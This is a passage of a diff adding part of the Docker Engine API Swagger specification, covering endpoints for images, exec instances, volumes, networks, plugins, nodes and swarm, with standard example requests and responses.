"8ed5115aeaad9abb174f68dcf135b49f11daf597678315231a32ca28441dec6a" + Gateway: "172.18.0.1" + IPAddress: "172.18.0.2" + IPPrefixLen: 16 + IPv6Gateway: "" + GlobalIPv6Address: "" + GlobalIPv6PrefixLen: 0 + MacAddress: "02:42:ac:12:00:02" + Mounts: [] + Volumes: + - + Name: "my-volume" + Driver: "local" + Mountpoint: "" + Labels: null + Scope: "" + Options: null + UsageData: + Size: 0 + RefCount: 0 + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["System"] + /images/{name}/get: + get: + summary: "Export an image" + description: | + Get a tarball containing all images and metadata for a repository. + + If `name` is a specific name and tag (e.g. `ubuntu:latest`), then only that image (and its parents) are returned. If `name` is an image ID, similarly only that image (and its parents) are returned, but with the exclusion of the `repositories` file in the tarball, as there were no image names referenced. + + ### Image tarball format + + An image tarball contains one directory per image layer (named using its long ID), each containing these files: + + - `VERSION`: currently `1.0` - the file format version + - `json`: detailed layer information, similar to `docker inspect layer_id` + - `layer.tar`: A tarfile containing the filesystem changes in this layer + + The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories for storing attribute changes and deletions. + + If the tarball defines a repository, the tarball should also include a `repositories` file at the root that contains a list of repository and tag names mapped to layer IDs. 
+ + ```json + { + "hello-world": { + "latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1" + } + } + ``` + operationId: "ImageGet" + produces: + - "application/x-tar" + responses: + 200: + description: "no error" + schema: + type: "string" + format: "binary" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "Image name or ID" + type: "string" + required: true + tags: ["Image"] + /images/get: + get: + summary: "Export several images" + description: | + Get a tarball containing all images and metadata for several image repositories. + + For each value of the `names` parameter: if it is a specific name and tag (e.g. `ubuntu:latest`), then only that image (and its parents) are returned; if it is an image ID, similarly only that image (and its parents) are returned and there would be no names referenced in the 'repositories' file for this image ID. + + For details on the format, see [the export image endpoint](#operation/ImageGet). + operationId: "ImageGetAll" + produces: + - "application/x-tar" + responses: + 200: + description: "no error" + schema: + type: "string" + format: "binary" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "names" + in: "query" + description: "Image names to filter by" + type: "array" + items: + type: "string" + tags: ["Image"] + /images/load: + post: + summary: "Import images" + description: | + Load a set of images and tags into a repository. + + For details on the format, see [the export image endpoint](#operation/ImageGet). 
+ operationId: "ImageLoad" + consumes: + - "application/x-tar" + produces: + - "application/json" + responses: + 200: + description: "no error" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "imagesTarball" + in: "body" + description: "Tar archive containing images" + schema: + type: "string" + format: "binary" + - name: "quiet" + in: "query" + description: "Suppress progress details during load." + type: "boolean" + default: false + tags: ["Image"] + /containers/{id}/exec: + post: + summary: "Create an exec instance" + description: "Run a command inside a running container." + operationId: "ContainerExec" + consumes: + - "application/json" + produces: + - "application/json" + responses: + 201: + description: "no error" + schema: + $ref: "#/definitions/IdResponse" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 409: + description: "container is paused" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "execConfig" + in: "body" + description: "Exec configuration" + schema: + type: "object" + properties: + AttachStdin: + type: "boolean" + description: "Attach to `stdin` of the exec command." + AttachStdout: + type: "boolean" + description: "Attach to `stdout` of the exec command." + AttachStderr: + type: "boolean" + description: "Attach to `stderr` of the exec command." + DetachKeys: + type: "string" + description: "Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-` where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`." + Tty: + type: "boolean" + description: "Allocate a pseudo-TTY." + Env: + description: "A list of environment variables in the form `[\"VAR=value\", ...]`." 
+ type: "array" + items: + type: "string" + Cmd: + type: "array" + description: "Command to run, as a string or array of strings." + items: + type: "string" + Privileged: + type: "boolean" + description: "Runs the exec process with extended privileges." + default: false + User: + type: "string" + description: "The user, and optionally, group to run the exec process inside the container. Format is one of: `user`, `user:group`, `uid`, or `uid:gid`." + example: + AttachStdin: false + AttachStdout: true + AttachStderr: true + DetachKeys: "ctrl-p,ctrl-q" + Tty: false + Cmd: + - "date" + Env: + - "FOO=bar" + - "BAZ=quux" + required: true + - name: "id" + in: "path" + description: "ID or name of container" + type: "string" + required: true + tags: ["Exec"] + /exec/{id}/start: + post: + summary: "Start an exec instance" + description: "Starts a previously set up exec instance. If detach is true, this endpoint returns immediately after starting the command. Otherwise, it sets up an interactive session with the command." + operationId: "ExecStart" + consumes: + - "application/json" + produces: + - "application/vnd.docker.raw-stream" + responses: + 200: + description: "No error" + 404: + description: "No such exec instance" + schema: + $ref: "#/definitions/ErrorResponse" + 409: + description: "Container is stopped or paused" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "execStartConfig" + in: "body" + schema: + type: "object" + properties: + Detach: + type: "boolean" + description: "Detach from the command." + Tty: + type: "boolean" + description: "Allocate a pseudo-TTY." + example: + Detach: false + Tty: false + - name: "id" + in: "path" + description: "Exec instance ID" + required: true + type: "string" + tags: ["Exec"] + /exec/{id}/resize: + post: + summary: "Resize an exec instance" + description: "Resize the TTY session used by an exec instance. This endpoint only works if `tty` was specified as part of creating and starting the exec instance." 
+ operationId: "ExecResize" + responses: + 201: + description: "No error" + 404: + description: "No such exec instance" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "Exec instance ID" + required: true + type: "string" + - name: "h" + in: "query" + description: "Height of the TTY session in characters" + type: "integer" + - name: "w" + in: "query" + description: "Width of the TTY session in characters" + type: "integer" + tags: ["Exec"] + /exec/{id}/json: + get: + summary: "Inspect an exec instance" + description: "Return low-level information about an exec instance." + operationId: "ExecInspect" + produces: + - "application/json" + responses: + 200: + description: "No error" + schema: + type: "object" + properties: + ID: + type: "string" + Running: + type: "boolean" + ExitCode: + type: "integer" + ProcessConfig: + $ref: "#/definitions/ProcessConfig" + OpenStdin: + type: "boolean" + OpenStderr: + type: "boolean" + OpenStdout: + type: "boolean" + ContainerID: + type: "string" + Pid: + type: "integer" + description: "The system process ID for the exec process." 
+ examples: + application/json: + CanRemove: false + ContainerID: "b53ee82b53a40c7dca428523e34f741f3abc51d9f297a14ff874bf761b995126" + DetachKeys: "" + ExitCode: 2 + ID: "f33bbfb39f5b142420f4759b2348913bd4a8d1a6d7fd56499cb41a1bb91d7b3b" + OpenStderr: true + OpenStdin: true + OpenStdout: true + ProcessConfig: + arguments: + - "-c" + - "exit 2" + entrypoint: "sh" + privileged: false + tty: true + user: "1000" + Running: false + Pid: 42000 + 404: + description: "No such exec instance" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "Exec instance ID" + required: true + type: "string" + tags: ["Exec"] + + /volumes: + get: + summary: "List volumes" + operationId: "VolumeList" + produces: ["application/json"] + responses: + 200: + description: "Summary volume data that matches the query" + schema: + type: "object" + required: [Volumes, Warnings] + properties: + Volumes: + type: "array" + x-nullable: false + description: "List of volumes" + items: + $ref: "#/definitions/Volume" + Warnings: + type: "array" + x-nullable: false + description: "Warnings that occurred when fetching the list of volumes" + items: + type: "string" + + examples: + application/json: + Volumes: + - Name: "tardis" + Driver: "local" + Mountpoint: "/var/lib/docker/volumes/tardis" + Labels: + com.example.some-label: "some-value" + com.example.some-other-label: "some-other-value" + Scope: "local" + Options: + device: "tmpfs" + o: "size=100m,uid=1000" + type: "tmpfs" + Warnings: [] + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "filters" + in: "query" + description: | + JSON encoded value of the filters (a `map[string][]string`) to + process on the volumes list. Available filters: + + - `name=` Matches all or part of a volume name. 
+ - `dangling=` When set to `true` (or `1`), returns all + volumes that are not in use by a container. When set to `false` + (or `0`), only volumes that are in use by one or more + containers are returned. + - `driver=` Matches all or part of a volume + driver name. + type: "string" + format: "json" + tags: ["Volume"] + + /volumes/create: + post: + summary: "Create a volume" + operationId: "VolumeCreate" + consumes: ["application/json"] + produces: ["application/json"] + responses: + 201: + description: "The volume was created successfully" + schema: + $ref: "#/definitions/Volume" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "volumeConfig" + in: "body" + required: true + description: "Volume configuration" + schema: + type: "object" + properties: + Name: + description: "The new volume's name. If not specified, Docker generates a name." + type: "string" + x-nullable: false + Driver: + description: "Name of the volume driver to use." + type: "string" + default: "local" + x-nullable: false + DriverOpts: + description: "A mapping of driver options and values. These options are passed directly to the driver and are driver specific." + type: "object" + additionalProperties: + type: "string" + Labels: + description: "User-defined key/value metadata." 
+ type: "object" + additionalProperties: + type: "string" + example: + Name: "tardis" + Labels: + com.example.some-label: "some-value" + com.example.some-other-label: "some-other-value" + Driver: "custom" + tags: ["Volume"] + + /volumes/{name}: + get: + summary: "Inspect a volume" + operationId: "VolumeInspect" + produces: ["application/json"] + responses: + 200: + description: "No error" + schema: + $ref: "#/definitions/Volume" + 404: + description: "No such volume" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + required: true + description: "Volume name or ID" + type: "string" + tags: ["Volume"] + + delete: + summary: "Remove a volume" + description: "Instruct the driver to remove the volume." + operationId: "VolumeDelete" + responses: + 204: + description: "The volume was removed" + 404: + description: "No such volume or volume driver" + schema: + $ref: "#/definitions/ErrorResponse" + 409: + description: "Volume is in use and cannot be removed" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + required: true + description: "Volume name or ID" + type: "string" + - name: "force" + in: "query" + description: "Force the removal of the volume" + type: "boolean" + default: false + tags: ["Volume"] + /volumes/prune: + post: + summary: "Delete unused volumes" + produces: + - "application/json" + operationId: "VolumePrune" + parameters: + - name: "filters" + in: "query" + description: | + Filters to process on the prune list, encoded as JSON (a `map[string][]string`). 
+ + Available filters: + type: "string" + responses: + 200: + description: "No error" + schema: + type: "object" + properties: + VolumesDeleted: + description: "Volumes that were deleted" + type: "array" + items: + type: "string" + SpaceReclaimed: + description: "Disk space reclaimed in bytes" + type: "integer" + format: "int64" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Volume"] + /networks: + get: + summary: "List networks" + operationId: "NetworkList" + produces: + - "application/json" + responses: + 200: + description: "No error" + schema: + type: "array" + items: + $ref: "#/definitions/Network" + examples: + application/json: + - Name: "bridge" + Id: "f2de39df4171b0dc801e8002d1d999b77256983dfc63041c0f34030aa3977566" + Created: "2016-10-19T06:21:00.416543526Z" + Scope: "local" + Driver: "bridge" + EnableIPv6: false + Internal: false + IPAM: + Driver: "default" + Config: + - + Subnet: "172.17.0.0/16" + Containers: + 39b69226f9d79f5634485fb236a23b2fe4e96a0a94128390a7fbbcc167065867: + EndpointID: "ed2419a97c1d9954d05b46e462e7002ea552f216e9b136b80a7db8d98b442eda" + MacAddress: "02:42:ac:11:00:02" + IPv4Address: "172.17.0.2/16" + IPv6Address: "" + Options: + com.docker.network.bridge.default_bridge: "true" + com.docker.network.bridge.enable_icc: "true" + com.docker.network.bridge.enable_ip_masquerade: "true" + com.docker.network.bridge.host_binding_ipv4: "0.0.0.0" + com.docker.network.bridge.name: "docker0" + com.docker.network.driver.mtu: "1500" + - Name: "none" + Id: "e086a3893b05ab69242d3c44e49483a3bbbd3a26b46baa8f61ab797c1088d794" + Created: "0001-01-01T00:00:00Z" + Scope: "local" + Driver: "null" + EnableIPv6: false + Internal: false + IPAM: + Driver: "default" + Config: [] + Containers: {} + Options: {} + - Name: "host" + Id: "13e871235c677f196c4e1ecebb9dc733b9b2d2ab589e30c539efeda84a24215e" + Created: "0001-01-01T00:00:00Z" + Scope: "local" + Driver: "host" + EnableIPv6: false + Internal: false + IPAM: + 
Driver: "default" + Config: [] + Containers: {} + Options: {} + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "filters" + in: "query" + description: | + JSON encoded value of the filters (a `map[string][]string`) to process on the networks list. Available filters: + + - `driver=` Matches a network's driver. + - `id=` Matches all or part of a network ID. + - `label=` or `label==` of a network label. + - `name=` Matches all or part of a network name. + - `type=["custom"|"builtin"]` Filters networks by type. The `custom` keyword returns all user-defined networks. + type: "string" + tags: ["Network"] + + /networks/{id}: + get: + summary: "Inspect a network" + operationId: "NetworkInspect" + produces: + - "application/json" + responses: + 200: + description: "No error" + schema: + $ref: "#/definitions/Network" + 404: + description: "Network not found" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "Network ID or name" + required: true + type: "string" + tags: ["Network"] + + delete: + summary: "Remove a network" + operationId: "NetworkDelete" + responses: + 204: + description: "No error" + 404: + description: "no such network" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "Network ID or name" + required: true + type: "string" + tags: ["Network"] + + /networks/create: + post: + summary: "Create a network" + operationId: "NetworkCreate" + consumes: + - "application/json" + produces: + - "application/json" + responses: + 201: + description: "No error" + schema: + type: "object" + properties: + Id: + description: "The ID of the created network." 
+ type: "string" + Warning: + type: "string" + example: + Id: "22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30" + Warning: "" + 403: + description: "operation not supported for pre-defined networks" + schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "plugin not found" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "networkConfig" + in: "body" + description: "Network configuration" + required: true + schema: + type: "object" + required: ["Name"] + properties: + Name: + description: "The network's name." + type: "string" + CheckDuplicate: + description: "Check for networks with duplicate names." + type: "boolean" + Driver: + description: "Name of the network driver plugin to use." + type: "string" + default: "bridge" + Internal: + description: "Restrict external access to the network." + type: "boolean" + IPAM: + description: "Optional custom IP scheme for the network." + $ref: "#/definitions/IPAM" + EnableIPv6: + description: "Enable IPv6 on the network." + type: "boolean" + Options: + description: "Network specific options to be used by the drivers." + type: "object" + additionalProperties: + type: "string" + Labels: + description: "User-defined key/value metadata." 
+ type: "object" + additionalProperties: + type: "string" + example: + Name: "isolated_nw" + CheckDuplicate: false + Driver: "bridge" + EnableIPv6: true + IPAM: + Driver: "default" + Config: + - Subnet: "172.20.0.0/16" + IPRange: "172.20.10.0/24" + Gateway: "172.20.10.11" + - Subnet: "2001:db8:abcd::/64" + Gateway: "2001:db8:abcd::1011" + Options: + foo: "bar" + Internal: true + Options: + com.docker.network.bridge.default_bridge: "true" + com.docker.network.bridge.enable_icc: "true" + com.docker.network.bridge.enable_ip_masquerade: "true" + com.docker.network.bridge.host_binding_ipv4: "0.0.0.0" + com.docker.network.bridge.name: "docker0" + com.docker.network.driver.mtu: "1500" + Labels: + com.example.some-label: "some-value" + com.example.some-other-label: "some-other-value" + tags: ["Network"] + + /networks/{id}/connect: + post: + summary: "Connect a container to a network" + operationId: "NetworkConnect" + consumes: + - "application/octet-stream" + responses: + 200: + description: "No error" + 403: + description: "Operation not supported for swarm scoped networks" + schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "Network or container not found" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "Network ID or name" + required: true + type: "string" + - name: "container" + in: "body" + required: true + schema: + type: "object" + properties: + Container: + type: "string" + description: "The ID or name of the container to connect to the network." 
+ EndpointConfig: + $ref: "#/definitions/EndpointSettings" + example: + Container: "3613f73ba0e4" + EndpointConfig: + IPAMConfig: + IPv4Address: "172.24.56.89" + IPv6Address: "2001:db8::5689" + tags: ["Network"] + + /networks/{id}/disconnect: + post: + summary: "Disconnect a container from a network" + operationId: "NetworkDisconnect" + consumes: + - "application/json" + responses: + 200: + description: "No error" + 403: + description: "Operation not supported for swarm scoped networks" + schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "Network or container not found" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "Network ID or name" + required: true + type: "string" + - name: "container" + in: "body" + required: true + schema: + type: "object" + properties: + Container: + type: "string" + description: "The ID or name of the container to disconnect from the network." + Force: + type: "boolean" + description: "Force the container to disconnect from the network." + tags: ["Network"] + /networks/prune: + post: + summary: "Delete unused networks" + consumes: + - "application/json" + produces: + - "application/json" + operationId: "NetworkPrune" + parameters: + - name: "filters" + in: "query" + description: | + Filters to process on the prune list, encoded as JSON (a `map[string][]string`). + + Available filters: + type: "string" + responses: + 200: + description: "No error" + schema: + type: "object" + properties: + NetworksDeleted: + description: "Networks that were deleted" + type: "array" + items: + type: "string" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Network"] + /plugins: + get: + summary: "List plugins" + operationId: "PluginList" + description: "Returns information about installed plugins." 
+ produces: ["application/json"] + responses: + 200: + description: "No error" + schema: + type: "array" + items: + $ref: "#/definitions/Plugin" + example: + - Id: "5724e2c8652da337ab2eedd19fc6fc0ec908e4bd907c7421bf6a8dfc70c4c078" + Name: "tiborvass/sample-volume-plugin" + Tag: "latest" + Active: true + Settings: + Env: + - "DEBUG=0" + Args: null + Devices: null + Config: + Description: "A sample volume plugin for Docker" + Documentation: "https://docs.docker.com/engine/extend/plugins/" + Interface: + Types: + - "docker.volumedriver/1.0" + Socket: "plugins.sock" + Entrypoint: + - "/usr/bin/sample-volume-plugin" + - "/data" + WorkDir: "" + User: {} + Network: + Type: "" + Linux: + Capabilities: null + AllowAllDevices: false + Devices: null + Mounts: null + PropagatedMount: "/data" + Env: + - Name: "DEBUG" + Description: "If set, prints debug messages" + Settable: null + Value: "0" + Args: + Name: "args" + Description: "command line arguments" + Settable: null + Value: [] + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Plugin"] + + /plugins/privileges: + get: + summary: "Get plugin privileges" + operationId: "GetPluginPrivileges" + responses: + 200: + description: "no error" + schema: + type: "array" + items: + description: "Describes a permission the user has to accept upon installing the plugin." + type: "object" + properties: + Name: + type: "string" + Description: + type: "string" + Value: + type: "array" + items: + type: "string" + example: + - Name: "network" + Description: "" + Value: + - "host" + - Name: "mount" + Description: "" + Value: + - "/data" + - Name: "device" + Description: "" + Value: + - "/dev/cpu_dma_latency" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "query" + description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted." 
+ required: true + type: "string" + tags: + - "Plugin" + + /plugins/pull: + post: + summary: "Install a plugin" + operationId: "PluginPull" + description: | + Pulls and installs a plugin. After the plugin is installed, it can be enabled using the [`POST /plugins/{name}/enable` endpoint](#operation/PostPluginsEnable). + produces: + - "application/json" + responses: + 204: + description: "no error" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "remote" + in: "query" + description: | + Remote reference for plugin to install. + + The `:latest` tag is optional, and is used as the default if omitted. + required: true + type: "string" + - name: "name" + in: "query" + description: | + Local name for the pulled plugin. + + The `:latest` tag is optional, and is used as the default if omitted. + required: false + type: "string" + - name: "X-Registry-Auth" + in: "header" + description: "A base64-encoded auth configuration to use when pulling a plugin from a registry. [See the authentication section for details.](#section/Authentication)" + type: "string" + - name: "body" + in: "body" + schema: + type: "array" + items: + description: "Describes a permission accepted by the user upon installing the plugin." 
+ type: "object" + properties: + Name: + type: "string" + Description: + type: "string" + Value: + type: "array" + items: + type: "string" + example: + - Name: "network" + Description: "" + Value: + - "host" + - Name: "mount" + Description: "" + Value: + - "/data" + - Name: "device" + Description: "" + Value: + - "/dev/cpu_dma_latency" + tags: ["Plugin"] + /plugins/{name}/json: + get: + summary: "Inspect a plugin" + operationId: "PluginInspect" + responses: + 200: + description: "no error" + schema: + $ref: "#/definitions/Plugin" + 404: + description: "plugin is not installed" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted." + required: true + type: "string" + tags: ["Plugin"] + /plugins/{name}: + delete: + summary: "Remove a plugin" + operationId: "PluginDelete" + responses: + 200: + description: "no error" + schema: + $ref: "#/definitions/Plugin" + 404: + description: "plugin is not installed" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted." + required: true + type: "string" + - name: "force" + in: "query" + description: "Disable the plugin before removing. This may result in issues if the plugin is in use by a container." + type: "boolean" + default: false + tags: ["Plugin"] + /plugins/{name}/enable: + post: + summary: "Enable a plugin" + operationId: "PluginEnable" + responses: + 200: + description: "no error" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "The name of the plugin. 
The `:latest` tag is optional, and is the default if omitted." + required: true + type: "string" + - name: "timeout" + in: "query" + description: "Set the HTTP client timeout (in seconds)" + type: "integer" + default: 0 + tags: ["Plugin"] + /plugins/{name}/disable: + post: + summary: "Disable a plugin" + operationId: "PluginDisable" + responses: + 200: + description: "no error" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted." + required: true + type: "string" + tags: ["Plugin"] + /plugins/{name}/upgrade: + post: + summary: "Upgrade a plugin" + operationId: "PluginUpgrade" + responses: + 204: + description: "no error" + 404: + description: "plugin not installed" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted." + required: true + type: "string" + - name: "remote" + in: "query" + description: | + Remote reference to upgrade to. + + The `:latest` tag is optional, and is used as the default if omitted. + required: true + type: "string" + - name: "X-Registry-Auth" + in: "header" + description: "A base64-encoded auth configuration to use when pulling a plugin from a registry. [See the authentication section for details.](#section/Authentication)" + type: "string" + - name: "body" + in: "body" + schema: + type: "array" + items: + description: "Describes a permission accepted by the user upon installing the plugin." 
+ type: "object" + properties: + Name: + type: "string" + Description: + type: "string" + Value: + type: "array" + items: + type: "string" + example: + - Name: "network" + Description: "" + Value: + - "host" + - Name: "mount" + Description: "" + Value: + - "/data" + - Name: "device" + Description: "" + Value: + - "/dev/cpu_dma_latency" + tags: ["Plugin"] + /plugins/create: + post: + summary: "Create a plugin" + operationId: "PluginCreate" + consumes: + - "application/x-tar" + responses: + 204: + description: "no error" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "query" + description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted." + required: true + type: "string" + - name: "tarContext" + in: "body" + description: "Path to tar containing plugin rootfs and manifest" + schema: + type: "string" + format: "binary" + tags: ["Plugin"] + /plugins/{name}/push: + post: + summary: "Push a plugin" + operationId: "PluginPush" + description: | + Push a plugin to the registry. + parameters: + - name: "name" + in: "path" + description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted." + required: true + type: "string" + responses: + 200: + description: "no error" + 404: + description: "plugin not installed" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Plugin"] + /plugins/{name}/set: + post: + summary: "Configure a plugin" + operationId: "PluginSet" + consumes: + - "application/json" + parameters: + - name: "name" + in: "path" + description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted." 
+ required: true + type: "string" + - name: "body" + in: "body" + schema: + type: "array" + items: + type: "string" + example: ["DEBUG=1"] + responses: + 204: + description: "No error" + 404: + description: "Plugin not installed" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Plugin"] + /nodes: + get: + summary: "List nodes" + operationId: "NodeList" + responses: + 200: + description: "no error" + schema: + type: "array" + items: + $ref: "#/definitions/Node" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "filters" + in: "query" + description: | + Filters to process on the nodes list, encoded as JSON (a `map[string][]string`). + + Available filters: + - `id=` + - `label=` + - `membership=`(`accepted`|`pending`)` + - `name=` + - `role=`(`manager`|`worker`)` + type: "string" + tags: ["Node"] + /nodes/{id}: + get: + summary: "Inspect a node" + operationId: "NodeInspect" + responses: + 200: + description: "no error" + schema: + $ref: "#/definitions/Node" + 404: + description: "no such node" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "The ID or name of the node" + type: "string" + required: true + tags: ["Node"] + delete: + summary: "Delete a node" + operationId: "NodeDelete" + responses: + 200: + description: "no error" + 404: + description: "no such node" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "The ID or name of the node" + type: "string" + required: true + - name: "force" + in: "query" + description: "Force remove a node from the swarm" + default: false + type: "boolean" + tags: ["Node"] + /nodes/{id}/update: + post: + 
summary: "Update a node" + operationId: "NodeUpdate" + responses: + 200: + description: "no error" + 404: + description: "no such node" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "The ID of the node" + type: "string" + required: true + - name: "body" + in: "body" + schema: + $ref: "#/definitions/NodeSpec" + - name: "version" + in: "query" + description: "The version number of the node object being updated. This is required to avoid conflicting writes." + type: "integer" + format: "int64" + required: true + tags: ["Node"] + /swarm: + get: + summary: "Inspect swarm" + operationId: "SwarmInspect" + responses: + 200: + description: "no error" + schema: + allOf: + - $ref: "#/definitions/ClusterInfo" + - type: "object" + properties: + JoinTokens: + description: "The tokens workers and managers need to join the swarm." + type: "object" + properties: + Worker: + description: "The token workers can use to join the swarm." + type: "string" + Manager: + description: "The token managers can use to join the swarm." 
+ type: "string" + example: + CreatedAt: "2016-08-15T16:00:20.349727406Z" + Spec: + Dispatcher: + HeartbeatPeriod: 5000000000 + Orchestration: + TaskHistoryRetentionLimit: 10 + CAConfig: + NodeCertExpiry: 7776000000000000 + Raft: + LogEntriesForSlowFollowers: 500 + HeartbeatTick: 1 + SnapshotInterval: 10000 + ElectionTick: 3 + TaskDefaults: {} + EncryptionConfig: + AutoLockManagers: false + Name: "default" + JoinTokens: + Worker: "SWMTKN-1-1h8aps2yszaiqmz2l3oc5392pgk8e49qhx2aj3nyv0ui0hez2a-6qmn92w6bu3jdvnglku58u11a" + Manager: "SWMTKN-1-1h8aps2yszaiqmz2l3oc5392pgk8e49qhx2aj3nyv0ui0hez2a-8llk83c4wm9lwioey2s316r9l" + ID: "70ilmkj2f6sp2137c753w2nmt" + UpdatedAt: "2016-08-15T16:32:09.623207604Z" + Version: + Index: 51 + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Swarm"] + /swarm/init: + post: + summary: "Initialize a new swarm" + operationId: "SwarmInit" + produces: + - "application/json" + - "text/plain" + responses: + 200: + description: "no error" + schema: + description: "The node ID" + type: "string" + example: "7v2t30z9blmxuhnyo6s4cpenp" + 400: + description: "bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 406: + description: "node is already part of a swarm" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "body" + in: "body" + required: true + schema: + type: "object" + properties: + ListenAddr: + description: "Listen address used for inter-manager communication, as well as determining the networking interface used for the VXLAN Tunnel Endpoint (VTEP). This can either be an address/port combination in the form `192.168.1.1:4567`, or an interface followed by a port number, like `eth0:4567`. If the port number is omitted, the default swarm listening port is used." + type: "string" + AdvertiseAddr: + description: "Externally reachable address advertised to other nodes. 
This can either be an address/port combination in the form `192.168.1.1:4567`, or an interface followed by a port number, like `eth0:4567`. If the port number is omitted, the port number from the listen address is used. If `AdvertiseAddr` is not specified, it will be automatically detected when possible." + type: "string" + ForceNewCluster: + description: "Force creation of a new swarm." + type: "boolean" + Spec: + $ref: "#/definitions/SwarmSpec" + example: + ListenAddr: "0.0.0.0:2377" + AdvertiseAddr: "192.168.1.1:2377" + ForceNewCluster: false + Spec: + Orchestration: {} + Raft: {} + Dispatcher: {} + CAConfig: {} + EncryptionConfig: + AutoLockManagers: false + tags: ["Swarm"] + /swarm/join: + post: + summary: "Join an existing swarm" + operationId: "SwarmJoin" + responses: + 200: + description: "no error" + 400: + description: "bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + 503: + description: "node is already part of a swarm" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "body" + in: "body" + required: true + schema: + type: "object" + properties: + ListenAddr: + description: "Listen address used for inter-manager communication if the node gets promoted to manager, as well as determining the networking interface used for the VXLAN Tunnel Endpoint (VTEP)." + type: "string" + AdvertiseAddr: + description: "Externally reachable address advertised to other nodes. This can either be an address/port combination in the form 